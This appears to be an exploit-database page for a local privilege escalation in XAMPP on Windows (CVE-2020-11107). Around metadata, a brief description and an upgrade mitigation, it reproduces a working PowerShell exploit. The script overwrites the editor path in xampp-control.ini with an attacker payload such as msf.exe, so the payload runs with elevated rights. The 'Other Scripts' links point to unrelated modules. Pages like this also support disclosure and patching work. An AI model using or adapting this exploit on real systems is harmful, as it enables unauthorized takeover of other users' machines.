header-logo
Suggest Exploit
vendor:
XAMPP
by:
Salman Asad (LeoBreaker)
8,8
CVSS
HIGH
Local Privilege Escalation
264
CWE
Product Name: XAMPP
Affected Version From: XAMPP < 7.2.29, 7.3.x < 7.3.16 & 7.4.x < 7.4.4
Affected Version To: N/A
Patch Exists: YES
Related CWE: CVE-2020-11107
CPE: a:apache:xampp
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=139033https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/scanner/http/cisco_directory_traversalhttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/http/mutiny_subnetmask_exec
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 10
2021

XAMPP 7.4.3 – Local Privilege Escalation

XAMPP versions < 7.2.29, 7.3.x < 7.3.16 & 7.4.x < 7.4.4 are vulnerable to local privilege escalation. An attacker can exploit this vulnerability by replacing the xampp-control.ini file with a malicious payload. This will allow the attacker to gain elevated privileges on the system.

Mitigation:

Upgrade to the latest version of XAMPP to mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: XAMPP 7.4.3 - Local Privilege Escalation
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Original Author: Maximilian Barz (@S1lkys)
# Date: 27/09/2021
# Vendor Homepage: https://www.apachefriends.org
# Version: XAMPP < 7.2.29, 7.3.x < 7.3.16 & 7.4.x < 7.4.4
# Tested on: Windows 10 + XAMPP 7.3.10
# References: https://github.com/S1lkys/CVE-2020-11107

$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
# Insert your payload path here
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file

Navigation

Suggest Exploit

Services By CQR